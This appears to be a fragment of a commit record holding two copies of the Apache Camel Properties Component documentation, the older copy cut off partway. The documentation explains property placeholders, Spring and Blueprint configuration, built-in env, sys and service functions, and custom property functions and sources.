So if the service is named FOO, then the OS environment\nvariables should be set as\n\n[source]\n----\nexport $FOO_SERVICE_HOST=myserver\nexport $FOO_SERVICE_PORT=8888\n----\n\nFor example if the FOO service a remote HTTP service, then we can refer\nto the service in the Camel endpoint uri, and use\nthe HTTP component to make the HTTP call:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"http:\/\/{`{service:FOO}`}\/myapp\"\/>\n <\/route>\n<\/camelContext>\n----\n\nAnd we can use default values if the service has not been defined, for\nexample to call a service on localhost, maybe for unit testing etc\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"http:\/\/{`{service:FOO:localhost:8080}`}\/myapp\"\/>\n <\/route>\n<\/camelContext>\n----\n\n== Using custom functions (advanced)\n\nThe xref:properties-component.adoc[Properties] component allow to plugin 3rd party\nfunctions which can be used during parsing of the property placeholders.\nThese functions are then able to do custom logic to resolve the\nplaceholders, such as looking up in databases, do custom computations,\nor whatnot. The name of the function becomes the prefix used in the\nplaceholder. This is best illustrated in the example code below\n\n[source,xml]\n----\n<bean id=\"beerFunction\" class=\"MyBeerFunction\"\/>\n\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <propertyPlaceholder id=\"properties\">\n <propertiesFunction ref=\"beerFunction\"\/>\n <\/propertyPlaceholder>\n\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{`{beer:FOO}`}\"\/>\n <to uri=\"{`{beer:BAR}`}\"\/>\n <\/route>\n<\/camelContext>\n----\n\n[NOTE]\n====\nThe location attribute (on propertyPlaceholder tag) is not mandatory\n====\n\nHere we have a Camel XML route where we have defined the\n`<propertyPlaceholder>` to use a custom function, which we refer to be the\nbean id - eg the `beerFunction`. As the beer function uses `\"beer\"` as its\nname, then the placeholder syntax can trigger the beer function by\nstarting with `beer:value`.\n\nThe implementation of the function is only two methods as shown below:\n\n[source,java]\n----\npublic static final class MyBeerFunction implements PropertiesFunction {\n\n @Override\n public String getName() {\n return \"beer\";\n }\n\n @Override\n public String apply(String remainder) {\n return \"mock:\" + remainder.toLowerCase();\n }\n}\n----\n\nThe function must implement\nthe `org.apache.camel.component.properties.PropertiesFunction`\ninterface. The method `getName` is the name of the function, eg beer.\nAnd the `apply` method is where we implement the custom logic to do. As\nthe sample code is from an unit test, it just returns a value to refer\nto a mock endpoint.\n\nTo register a custom function from Java code is as shown below:\n\n[source,java]\n----\nPropertiesComponent pc = (org.apache.camel.componennt.properties.PropertiesComponent) context.getPropertiesComponent();\npc.addFunction(new MyBeerFunction());\n----\n\n\n== Using 3rd-party properties sources\n\nThe properties component allows to plugin 3rd party sources to load and lookup properties via the `PropertySource`\nAPI from camel-api. 
For example the `camel-microprofile-config` component is implemented using this.\nThe 3rd-party `PropertySource` can automatic be discoverd from classpath when Camel is starting up.\nThis is done by include the file `META-INF\/services\/org\/apache\/camel\/property-source-factory` file\nwhich refers to the fully qualified class name of the `PropertySource` implementation.\nSee the `camel-microprofile-config` for an example.\n\nYou can also register 3rd-part property sources via Java API\n\n[source,java]\n----\nPropertiesComponent pc = ...\npc.addPropertySource(myPropertySource);\n----\n\n=== LoadablePropertySource\n\nA `PropertySource` can define that it supports loading all its properties from the source at once,\nfor example from file system. This allows Camel properties component to load these properties at once\nduring startup.\n\n=== PropertySource\n\nThe regular `PropertySource` will lookup the property on-demand, for example to lookup\nvalues from a backend source such as a database or HashiCorp Vault etc.\n\n\n","old_contents":"[[properties-component]]\n= Properties Component\n\/\/THIS FILE IS COPIED: EDIT THE SOURCE FILE:\n:page-source: core\/camel-base\/src\/main\/docs\/properties-component.adoc\n\/\/Written by hand, not generated.\n:docTitle: Properties\n:artifactId: camel-base\n:description: The properties component is used for property placeholders in your Camel application, such as endpoint URIs.\n:since: 2.3\n:supportLevel: Stable\n\n*Since Camel {since}*\n\nThe properties component is used for property placeholders in your Camel application, such as endpoint URIs.\nIt is *not* a regular Camel component with producer and consumer for routing messages. However for historical\nreasons it was named `PropertiesComponent` and this name is commonly known and therefore we keep using it.\n\n== Spring Boot Auto-Configuration\n\nThe component supports 10 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.properties.auto-discover-properties-sources* | Whether to automatically discovery instances of PropertiesSource from registry and service factory. | true | Boolean\n| *camel.component.properties.default-fallback-enabled* | If false, the component does not attempt to find a default for the key by looking after the colon separator. | true | Boolean\n| *camel.component.properties.encoding* | Encoding to use when loading properties file from the file system or classpath. If no encoding has been set, then the properties files is loaded using ISO-8859-1 encoding (latin-1) as documented by java.util.Properties#load(java.io.InputStream) | | String\n| *camel.component.properties.environment-variable-mode* | Sets the OS environment variables mode (0 = never, 1 = fallback, 2 = override). The default mode (override) is to use OS environment variables if present, and override any existing properties. OS environment variable mode is checked before JVM system property mode | 2 | Integer\n| *camel.component.properties.ignore-missing-location* | Whether to silently ignore if a location cannot be located, such as a properties file not found. | false | Boolean\n| *camel.component.properties.initial-properties* | Sets initial properties which will be used before any locations are resolved. The option is a java.util.Properties type. | | String\n| *camel.component.properties.location* | A list of locations to load properties. You can use comma to separate multiple locations. 
This option will override any default locations and only use the locations from this option. | | String\n| *camel.component.properties.override-properties* | Sets a special list of override properties that take precedence and will use first, if a property exists. The option is a java.util.Properties type. | | String\n| *camel.component.properties.properties-parser* | To use a custom PropertiesParser. The option is a org.apache.camel.component.properties.PropertiesParser type. | | String\n| *camel.component.properties.system-properties-mode* | Sets the JVM system property mode (0 = never, 1 = fallback, 2 = override). The default mode (override) is to use system properties if present, and override any existing properties. OS environment variable mode is checked before JVM system property mode | 2 | Integer\n|===\n\n[TIP]\n**Resolving property from Java code** +\nYou can use the method `resolvePropertyPlaceholders` on the\n`CamelContext` to resolve a property from any Java code.\n\n== Using PropertyPlaceholder\n\nCamel now provides a new `PropertiesComponent` in *camel-core* which\nallows you to use property placeholders when defining Camel\nEndpoint URIs.\n\nThis works much like you would do if using Spring's\n`<property-placeholder>` tag. However Spring have a limitation which\nprevents 3rd party frameworks to leverage Spring property placeholders\nto the fullest. See more at\nxref:manual:faq:how-do-i-use-spring-property-placeholder-with-camel-xml.adoc[How do\nI use Spring Property Placeholder with Camel XML].\n\n[TIP]\n**Bridging Spring and Camel property placeholders** +\nYou can bridge the Spring property placeholder\nwith Camel, see further below for more details.\n\nThe property placeholder is generally in use when doing:\n\n* lookup or creating endpoints\n* lookup of beans in the Registry\n* additional supported in Spring XML (see below in examples)\n* using Blueprint PropertyPlaceholder with Camel\nxref:properties-component.adoc[Properties] component\n* using `@PropertyInject` to inject a property in a POJO\n* Using default value if a property does not exist\n* Include out of the box functions, to lookup property\nvalues from OS environment variables, JVM system properties, or the\nservice idiom.\n* Using custom functions, which can be plugged into the\nproperty component.\n\n== Syntax\n\nThe syntax to use Camel's property placeholder is to use `{\\{key}}` for\nexample `{{file.uri}}` where `file.uri` is the property key.\n\nYou can use property placeholders in parts of the endpoint URI's which\nfor example you can use placeholders for parameters in the URIs.\n\nYou can specify a default value to use if\na property with the key does not exists, eg `file.url:\/some\/path` where\nthe default value is the text after the colon (eg \/some\/path).\n\n[NOTE]\n====\nDo not use colon in the property key. The colon is used as a separator\ntoken when you are providing a default value.\n====\n\n== Defining location\n\nThe properties component needs to know a location(s) where to resolve the\nproperties. You can define 1 to many locations. 
If you define the\nlocation in a single String property you can separate multiple locations\nwith comma such as:\n\n[source,java]\n----\npc.setLocation(\"com\/mycompany\/myprop.properties,com\/mycompany\/other.properties\");\n----\n\nYou can set which location can be discarded if missing by setting the ``optional`` attribute, which is false by default, i.e:\n\n[source,java]\n----\npc.setLocations(\n \"com\/mycompany\/override.properties;optional=true\"\n \"com\/mycompany\/defaults.properties\");\n----\n\n== Using system and environment variables in locations\n\nThe location now supports using placeholders for JVM system properties\nand OS environments variables.\n\nFor example:\n\n[source]\n----\nlocation=file:${karaf.home}\/etc\/foo.properties\n----\n\nIn the location above we defined a location using the file scheme using\nthe JVM system property with key `karaf.home`.\n\nTo use an OS environment variable instead you would have to prefix with\nenv:\n\n[source]\n----\nlocation=file:${env:APP_HOME}\/etc\/foo.properties\n----\n\nWhere `APP_HOME` is an OS environment.\n\n[NOTE]\n====\nSome OS'es (such as Linux) do not support dashes in environment variable names,\nso here we are using `APP_HOME`. But if you specify `APP-HOME` then Camel 3 will automatic lookup\nthe value as `APP_HOME` (with underscore) as fallback.\n====\n\nYou can have multiple placeholders in the same location, such as:\n\n[source]\n----\nlocation=file:${env:APP_HOME}\/etc\/${prop.name}.properties\n----\n\n== Configuring in Java DSL\n\nYou have to create and register the `PropertiesComponent` under the name\n`properties` such as:\n\n[source,java]\n----\nPropertiesComponent pc = camelContext.getPropertiesComponent();\npc.setLocation(\"classpath:com\/mycompany\/myprop.properties\");\n----\n\n== Configuring in Spring XML\n\nSpring XML offers two variations to configure. You can define a spring\nbean as a `PropertiesComponent` which resembles the way done in Java\nDSL. 
Or you can use the `<propertyPlaceholder>` tag.\n\n[source,xml]\n----\n<bean id=\"properties\" class=\"org.apache.camel.component.properties.PropertiesComponent\">\n <property name=\"location\" value=\"classpath:com\/mycompany\/myprop.properties\"\/>\n<\/bean>\n----\n\nUsing the `<propertyPlaceholder>` tag makes the configuration a bit more\nfresh such as:\n\n[source,xml]\n----\n<camelContext ...>\n <propertyPlaceholder id=\"properties\" location=\"com\/mycompany\/myprop.properties\"\/>\n<\/camelContext>\n----\n\nSetting the properties location through the location tag works just fine but sometimes you have a number of resources to take into account and starting from *Camel 2.19.0* you can set the properties location with a dedicated propertiesLocation:\n\n[source,xml]\n----\n<camelContext ...>\n <propertyPlaceholder id=\"myPropertyPlaceholder\">\n <propertiesLocation\n resolver = \"classpath\"\n path = \"com\/my\/company\/something\/my-properties-1.properties\"\n optional = \"false\"\/>\n <propertiesLocation\n resolver = \"classpath\"\n path = \"com\/my\/company\/something\/my-properties-2.properties\"\n optional = \"false\"\/>\n <propertiesLocation\n resolver = \"file\"\n path = \"${karaf.home}\/etc\/my-override.properties\"\n optional = \"true\"\/>\n <\/propertyPlaceholder>\n<\/camelContext>\n----\n\n[TIP]\n**Specifying the cache option inside XML** +\nCamel supports specifying a value for the cache option both\ninside the Spring as well as the Blueprint XML.\n\n== Using a Properties from the Registry\n\nFor example in OSGi you may want to expose a service which returns the\nproperties as a `java.util.Properties` object.\n\nThen you could setup the xref:properties-component.adoc[Properties] component as\nfollows:\n\n[source,xml]\n----\n <propertyPlaceholder id=\"properties\" location=\"ref:myProperties\"\/>\n----\n\nWhere `myProperties` is the id to use for lookup in the OSGi registry.\nNotice we use the `ref:` prefix to tell Camel that it should lookup the\nproperties for the Registry.\n\n== Examples using properties component\n\nWhen using property placeholders in the endpoint URIs you can either use\nthe `properties:` component or define the placeholders directly in the\nURI. 
We will show example of both cases, starting with the former.\n\n[source,java]\n----\n\/\/ properties\ncool.end=mock:result\n\n\/\/ route\nfrom(\"direct:start\").to(\"{{cool.end}}\");\n----\n\nYou can also use placeholders as a part of the endpoint uri:\n\n[source,java]\n----\n\/\/ properties\ncool.foo=result\n\n\/\/ route\nfrom(\"direct:start\").to(\"mock:{{cool.foo}}\");\n----\n\nIn the example above the to endpoint will be resolved to `mock:result`.\n\nYou can also have properties with refer to each other such as:\n\n[source,java]\n----\n\/\/ properties\ncool.foo=result\ncool.concat=mock:{{cool.foo}}\n\n\/\/ route\nfrom(\"direct:start\").to(\"mock:{{cool.concat}}\");\n----\n\nNotice how `cool.concat` refer to another property.\n\nAnd you can use placeholders several times:\n\n[source,java]\n----\n\/\/ properties\ncool.start=direct:start\ncool.showid=true\ncool.result=result\n\n\/\/ route\nfrom(\"{{cool.start}}\")\n .to(\"log:{{cool.start}}?showBodyType=false&showExchangeId={{cool.showid}}\")\n .to(\"mock:{{cool.result}}\");\n----\n\nYou can also your property placeholders when using\nProducerTemplate for example:\n\n[source,java]\n----\ntemplate.sendBody(\"{{cool.start}}\", \"Hello World\");\n----\n\n== Example with xref:languages:simple-language.adoc[Simple] language\n\nThe xref:languages:simple-language.adoc[Simple] language now also support using property\nplaceholders, for example in the route below:\n\n[source,java]\n----\n\/\/ properties\ncheese.quote=Camel rocks\n\n\/\/ route\nfrom(\"direct:start\")\n .transform().simple(\"Hi ${body} do you think ${properties:cheese.quote}?\");\n----\n\n== Additional property placeholder supported in Spring XML\n\nThe property placeholders is also supported in many of the Camel Spring\nXML tags such as\n`<package>, <packageScan>, <contextScan>, <jmxAgent>, <endpoint>, <routeBuilder>, <proxy>`\nand the others.\n\nThe example below has property placeholder in the `<jmxAgent>` tag:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <propertyPlaceholder id=\"properties\" location=\"org\/apache\/camel\/spring\/jmx.properties\"\/>\n <!-- we can use property placeholders when we define the JMX agent -->\n <jmxAgent id=\"agent\" disabled=\"{{myjmx.disabled}}\"\n usePlatformMBeanServer=\"{{myjmx.usePlatform}}\"\n statisticsLevel=\"RoutesOnly\" useHostIPAddress=\"true\"\/>\n <route id=\"foo\" autoStartup=\"false\">\n <from uri=\"seda:start\"\/>\n <to uri=\"mock:result\"\/>\n <\/route>\n<\/camelContext>\n----\n\nYou can also define property placeholders in the various attributes on\nthe `<camelContext>` tag such as `trace` as shown here:\n\n[source,xml]\n----\n<camelContext trace=\"{{foo.trace}}\" xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <propertyPlaceholder id=\"properties\" location=\"org\/apache\/camel\/spring\/processor\/myprop.properties\"\/>\n <template id=\"camelTemplate\" defaultEndpoint=\"{{foo.cool}}\"\/>\n <route>\n <from uri=\"direct:start\"\/>\n <setHeader name=\"{{foo.header}}\">\n <simple>${in.body} World!<\/simple>\n <\/setHeader>\n <to uri=\"mock:result\"\/>\n <\/route>\n<\/camelContext>\n----\n\n== Using JVM system properties or Environment variables as override or fallback values\n\nThe properties components supports using JVM system properties and also OS environment variables\nas values which can either be used as override or fallback values.\n\nThe default mode is that both of them are in override mode, and they are check in the following order:\n\n1. 
OS environment variable (override mode)\n2. JVM system property (override mode)\n3. Property files and other locations\n4. OS environment variable (fallback mode)\n5. JVM system property (fallback mode)\n\nThe check stops at first found property value for the key.\n\nYou can control these modes using the `systemPropertiesMode` and `environmentVariableMode`\noptions on the property's component.\n\n== Using property placeholders for any kind of attribute in the XML DSL\n\nIn the example below we use the `prop` prefix for the namespace\ncamel.apache.org\/schema\/placeholder by which we can use the\n`prop` prefix in the attributes in the XML DSLs. Notice how we use that\nin the Multicast to indicate that the option\n`stopOnException` should be the value of the placeholder with the key\n\"stop\".\n\nIn our properties file we have the value defined as\n\n[source]\n----\nstop=true\n----\n\n== Using Blueprint property placeholder with Camel routes\n\nCamel supports Blueprint\nwhich also offers a property placeholder service. Camel supports\nconvention over configuration, so all you have to do is to define the\nOSGi Blueprint property placeholder in the XML file as shown below:\n\n[source,xml]\n----\n<blueprint xmlns=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns:cm=\"http:\/\/aries.apache.org\/blueprint\/xmlns\/blueprint-cm\/v1.0.0\"\n xsi:schemaLocation=\"\n http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0 https:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\/blueprint.xsd\">\n\n <!-- OSGI blueprint property placeholder -->\n <cm:property-placeholder id=\"myblueprint.placeholder\" persistent-id=\"camel.blueprint\">\n <!-- list some properties as needed -->\n <cm:default-properties>\n <cm:property name=\"result\" value=\"mock:result\"\/>\n <\/cm:default-properties>\n <\/cm:property-placeholder>\n\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <!-- in the route we can use {{ }} placeholders which will lookup in blueprint\n as Camel will auto detect the OSGi blueprint property placeholder and use it -->\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"mock:foo\"\/>\n <to uri=\"{{result}}\"\/>\n <\/route>\n <\/camelContext>\n<\/blueprint>\n----\n\n=== Using OSGi blueprint property placeholders in Camel routes\n\nBy default Camel detects and uses OSGi blueprint property placeholder\nservice. You can disable this by setting the attribute\n`useBlueprintPropertyResolver` to false on the `<camelContext>`\ndefinition.\n\n=== About placeholder syntax\n\nNotice how we can use the Camel syntax for placeholders `{{` and `}}` in the\nCamel route, which will lookup the value from OSGi blueprint.\n\nThe blueprint syntax for placeholders is `${ }`. So outside the\n`<camelContext>` you must use the `${ }` syntax. Whereas inside\n`<camelContext>` you must use `{{` and `}}` syntax.\n\nOSGi blueprint allows you to configure the syntax, so you can actually\nalign those if you want.\n\nYou can also explicit refer to a specific OSGi blueprint property\nplaceholder by its id. 
For that you need to use the Camel's\n`<propertyPlaceholder>` as shown in the example below:\n\n[source,xml]\n----\n<blueprint xmlns=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns:cm=\"http:\/\/aries.apache.org\/blueprint\/xmlns\/blueprint-cm\/v1.0.0\"\n xsi:schemaLocation=\"\n http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0 https:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\/blueprint.xsd\">\n\n <!-- OSGI blueprint property placeholder -->\n <cm:property-placeholder id=\"myblueprint.placeholder\" persistent-id=\"camel.blueprint\">\n <!-- list some properties as needed -->\n <cm:default-properties>\n <cm:property name=\"prefix.result\" value=\"mock:result\"\/>\n <\/cm:default-properties>\n <\/cm:property-placeholder>\n\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <!-- using Camel properties component and refer to the blueprint property placeholder by its id -->\n <propertyPlaceholder id=\"properties\" location=\"blueprint:myblueprint.placeholder\"\/>\n\n <!-- in the route we can use {{ }} placeholders which will lookup in blueprint -->\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"mock:foo\"\/>\n <to uri=\"{{prefix.result}}\"\/>\n <\/route>\n <\/camelContext>\n<\/blueprint>\n----\n\n\n== Explicit referring to a OSGi blueprint placeholder in Camel\n\nNotice how we use the `blueprint` scheme to refer to the OSGi blueprint\nplaceholder by its id. This allows you to mix and match, for example you\ncan also have additional schemes in the location. For example to load a\nfile from the classpath you can do:\n\n[source]\n----\nlocation=\"blueprint:myblueprint.placeholder,classpath:myproperties.properties\"\n----\n\nEach location is separated by comma.\n\n== Overriding Blueprint property placeholders outside CamelContext\n\nWhen using Blueprint property placeholder in the Blueprint XML file, you\ncan declare the properties directly in the XML file as shown below:\n\n[source,xml]\n----\n<!-- blueprint property placeholders -->\n<cm:property-placeholder persistent-id=\"my-placeholders\" update-strategy=\"reload\">\n <cm:default-properties>\n <cm:property name=\"greeting\" value=\"Hello\"\/>\n <cm:property name=\"destination\" value=\"mock:result\"\/>\n <\/cm:default-properties>\n<\/cm:property-placeholder>\n\n<!-- a bean that uses a blueprint property placeholder -->\n<bean id=\"myCoolBean\" class=\"org.apache.camel.test.blueprint.MyCoolBean\">\n <property name=\"say\" value=\"${greeting}\"\/>\n<\/bean>\n\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n\n <route>\n <from uri=\"direct:start\"\/>\n <bean ref=\"myCoolBean\" method=\"saySomething\"\/>\n <to uri=\"{{destination}}\"\/>\n <\/route>\n\n<\/camelContext>\n----\n\nNotice that we have a `<bean>` which refers to one of the properties. And\nin the Camel route we refer to the other using the `{{` and `}}` notation.\n\nNow if you want to override these Blueprint properties from an unit\ntest, you can do this as shown below:\n\n[source,java]\n----\nprotected String useOverridePropertiesWithConfigAdmin(Dictionary props) {\n \/\/ add the properties we want to override\n props.put(\"greeting\", \"Bye\");\n\n \/\/ return the PID of the config-admin we are using in the blueprint xml file\n return \"my-placeholders\";\n}\n----\n\nTo do this we override and implement the\n`useOverridePropertiesWithConfigAdmin` method. We can then put the\nproperties we want to override on the given props parameter. 
And the\nreturn value *must* be the `persistence-id` of the\n`<cm:property-placeholder>` tag, which you define in the blueprint XML\nfile.\n\n== Using .cfg or .properties file for Blueprint property placeholders\n\nWhen using Blueprint property placeholder in the Blueprint XML file, you\ncan declare the properties in a `.properties` or `.cfg` file. If you use\nApache ServieMix \/ Karaf then this container has a convention that it\nloads the properties from a file in the etc directory with the naming\n`etc\/pid.cfg`, where `pid` is the `persistence-id`.\n\nFor example in the blueprint XML file we have the\n`persistence-id=\"stuff\"`, which mean it will load the configuration file\nas `etc\/stuff.cfg`.\n\nNow if you want to unit test this blueprint XML file, then you can\noverride the `loadConfigAdminConfigurationFile` and tell Camel which\nfile to load as shown below:\n\n[source,java]\n----\n@Override\nprotected String[] loadConfigAdminConfigurationFile() {\n \/\/ String[0] = tell Camel the path of the .cfg file to use for OSGi ConfigAdmin in the blueprint XML file\n \/\/ String[1] = tell Camel the persistence-id of the cm:property-placeholder in the blueprint XML file\n return new String[]{\"src\/test\/resources\/etc\/stuff.cfg\", \"stuff\"};\n}\n----\n\nNotice that this method requires to return a `String[]` with 2 values. The\n1st value is the path for the configuration file to load.\nThe 2nd value is the `persistence-id` of the `<cm:property-placeholder>`\ntag.\n\nThe `stuff.cfg` file is just a plain properties file with the property\nplaceholders such as:\n\n[source]\n----\n== this is a comment\ngreeting=Bye\n----\n\n== Using .cfg file and overriding properties for Blueprint property placeholders\n\nYou can do both as well. Here is a complete example. First we have the\nBlueprint XML file:\n\nAnd in the unit test class we do as follows:\n\nAnd the `etc\/stuff.cfg` configuration file contains\n\n[source]\n----\ngreeting=Bye\necho=Yay\ndestination=mock:result\n----\n\n== Bridging Spring and Camel property placeholders\n\nThe Spring Framework does not allow 3rd party frameworks such as Apache\nCamel to seamless hook into the Spring property placeholder mechanism.\nHowever you can easily bridge Spring and Camel by declaring a Spring\nbean with the type\n`org.apache.camel.spring.spi.BridgePropertyPlaceholderConfigurer`, which\nis a Spring\n`org.springframework.beans.factory.config.PropertyPlaceholderConfigurer`\ntype.\n\nTo bridge Spring and Camel you must define a single bean as shown below:\n\n*Bridging Spring and Camel property placeholders*\n\nYou *must not* use the spring <context:property-placeholder> namespace\nat the same time; this is not possible.\n\nAfter declaring this bean, you can define property placeholders using\nboth the Spring style, and the Camel style within the <camelContext> tag\nas shown below:\n\n*Using bridge property placeholders*\n\nNotice how the hello bean is using pure Spring property placeholders\nusing the `${ }` notation. And in the Camel routes we use the Camel\nplaceholder notation with `{{` and `}}`.\n\n== Clashing Spring property placeholders with Camels Simple language\n\nTake notice when using Spring bridging placeholder then the spring `${ }`\nsyntax clashes with the xref:languages:simple-language.adoc[Simple] in Camel, and therefore\ntake care. 
For example:\n\n[source,xml]\n----\n<setHeader name=\"Exchange.FILE_NAME\">\n <simple>{{file.rootdir}}\/${in.header.CamelFileName}<\/simple>\n<\/setHeader>\n----\n\nclashes with Spring property placeholders, and you should use `$simple{ }`\nto indicate using the xref:languages:simple-language.adoc[Simple] language in Camel.\n\n[source,xml]\n----\n<setHeader name=\"Exchange.FILE_NAME\">\n <simple>{{file.rootdir}}\/$simple{in.header.CamelFileName}<\/simple>\n<\/setHeader>\n----\n\nAn alternative is to configure the `PropertyPlaceholderConfigurer` with\n`ignoreUnresolvablePlaceholders` option to `true`.\n\n== Overriding properties from Camel test kit\n\nWhen Testing with Camel and using the\nxref:properties-component.adoc[Properties] component, you may want to be able to\nprovide the properties to be used from directly within the unit test\nsource code. +\nCamel test kits, eg `CamelTestSupport` class offers the following methods\n\n* `useOverridePropertiesWithPropertiesComponent`\n* `ignoreMissingLocationWithPropertiesComponent`\n\nSo for example in your unit test classes, you can override the\n`useOverridePropertiesWithPropertiesComponent` method and return a\n`java.util.Properties` that contains the properties which should be\npreferred to be used.\n\n=== Providing properties from within unit test source\n\nThis can be done from any of the Camel Test kits, such as camel-test,\ncamel-test-spring, and camel-test-blueprint.\n\nThe `ignoreMissingLocationWithPropertiesComponent` can be used to\ninstruct Camel to ignore any locations which was not discoverable, for\nexample if you run the unit test, in an environment that does not have\naccess to the location of the properties.\n\n== Using @PropertyInject\n\nCamel allows to inject property placeholders in POJOs using the\n`@PropertyInject` annotation which can be set on fields and setter\nmethods.\n\nFor example you can use that with `RouteBuilder` classes, such as shown\nbelow:\n\n[source,java]\n----\npublic class MyRouteBuilder extends RouteBuilder {\n\n @PropertyInject(\"hello\")\n private String greeting;\n\n @Override\n public void configure() throws Exception {\n from(\"direct:start\")\n .transform().constant(greeting)\n .to(\"{{result}}\");\n }\n\n}\n----\n\nNotice we have annotated the greeting field with `@PropertyInject` and\ndefine it to use the key `\"hello\"`. 
Camel will then lookup the property\nwith this key and inject its value, converted to a String type.\n\nYou can also use multiple placeholders and text in the key, for example\nwe can do:\n\n[source,java]\n----\n@PropertyInject(\"Hello {{name}} how are you?\")\nprivate String greeting;\n----\n\nThis will lookup the placeholder with they key `\"name\"`.\n\nYou can also add a default value if the key does not exists, such as:\n\n[source,java]\n----\n@PropertyInject(value = \"myTimeout\", defaultValue = \"5000\")\nprivate int timeout;\n----\n\n== Using out of the box functions\n\nThe xref:properties-component.adoc[Properties] component includes the following\nfunctions out of the box\n\n* `env` - A function to lookup the property from OS environment variables\n* `sys` - A function to lookup the property from Java JVM system\nproperties\n* `service` - A function to lookup the property from OS environment\nvariables using the service naming idiom\n* `service.name` - A function to lookup the\nproperty from OS environment variables using the service naming idiom\nreturning the hostname part only\n* `service.port` - A function to lookup the\nproperty from OS environment variables using the service naming idiom\nreturning the port part only\n\nAs you can see these functions is intended to make it easy to lookup\nvalues from the environment. As they are provided out of the box, they\ncan easily be used as shown below:\n\n[source,xml]\n----\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{`{env:SOMENAME}`}\"\/>\n <to uri=\"{`{sys:MyJvmPropertyName}`}\"\/>\n <\/route>\n <\/camelContext>\n----\n\nYou can use default values as well, so if the property does not exists,\nyou can define a default value as shown below, where the default value\nis a `log:foo` and `log:bar` value.\n\n[source,xml]\n----\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{`{env:SOMENAME:log:foo}`}\"\/>\n <to uri=\"{`{sys:MyJvmPropertyName:log:bar}`}\"\/>\n <\/route>\n <\/camelContext>\n----\n\nThe service function is for looking up a service which is defined using\nOS environment variables using the service naming idiom, to refer to a\nservice location using `hostname : port`\n\n* __NAME__**_SERVICE_HOST**\n* __NAME__**_SERVICE_PORT**\n\nin other words the service uses `_SERVICE_HOST` and `_SERVICE_PORT` as\nprefix. 
So if the service is named FOO, then the OS environment\nvariables should be set as\n\n[source]\n----\nexport $FOO_SERVICE_HOST=myserver\nexport $FOO_SERVICE_PORT=8888\n----\n\nFor example if the FOO service a remote HTTP service, then we can refer\nto the service in the Camel endpoint uri, and use\nthe HTTP component to make the HTTP call:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"http:\/\/{`{service:FOO}`}\/myapp\"\/>\n <\/route>\n<\/camelContext>\n----\n\nAnd we can use default values if the service has not been defined, for\nexample to call a service on localhost, maybe for unit testing etc\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"http:\/\/{`{service:FOO:localhost:8080}`}\/myapp\"\/>\n <\/route>\n<\/camelContext>\n----\n\n== Using custom functions (advanced)\n\nThe xref:properties-component.adoc[Properties] component allow to plugin 3rd party\nfunctions which can be used during parsing of the property placeholders.\nThese functions are then able to do custom logic to resolve the\nplaceholders, such as looking up in databases, do custom computations,\nor whatnot. The name of the function becomes the prefix used in the\nplaceholder. This is best illustrated in the example code below\n\n[source,xml]\n----\n<bean id=\"beerFunction\" class=\"MyBeerFunction\"\/>\n\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <propertyPlaceholder id=\"properties\">\n <propertiesFunction ref=\"beerFunction\"\/>\n <\/propertyPlaceholder>\n\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{`{beer:FOO}`}\"\/>\n <to uri=\"{`{beer:BAR}`}\"\/>\n <\/route>\n<\/camelContext>\n----\n\n[NOTE]\n====\nThe location attribute (on propertyPlaceholder tag) is not mandatory\n====\n\nHere we have a Camel XML route where we have defined the\n`<propertyPlaceholder>` to use a custom function, which we refer to be the\nbean id - eg the `beerFunction`. As the beer function uses `\"beer\"` as its\nname, then the placeholder syntax can trigger the beer function by\nstarting with `beer:value`.\n\nThe implementation of the function is only two methods as shown below:\n\n[source,java]\n----\npublic static final class MyBeerFunction implements PropertiesFunction {\n\n @Override\n public String getName() {\n return \"beer\";\n }\n\n @Override\n public String apply(String remainder) {\n return \"mock:\" + remainder.toLowerCase();\n }\n}\n----\n\nThe function must implement\nthe `org.apache.camel.component.properties.PropertiesFunction`\ninterface. The method `getName` is the name of the function, eg beer.\nAnd the `apply` method is where we implement the custom logic to do. As\nthe sample code is from an unit test, it just returns a value to refer\nto a mock endpoint.\n\nTo register a custom function from Java code is as shown below:\n\n[source,java]\n----\nPropertiesComponent pc = (org.apache.camel.componennt.properties.PropertiesComponent) context.getPropertiesComponent();\npc.addFunction(new MyBeerFunction());\n----\n\n\n== Using 3rd-party properties sources\n\nThe properties component allows to plugin 3rd party sources to load and lookup properties via the 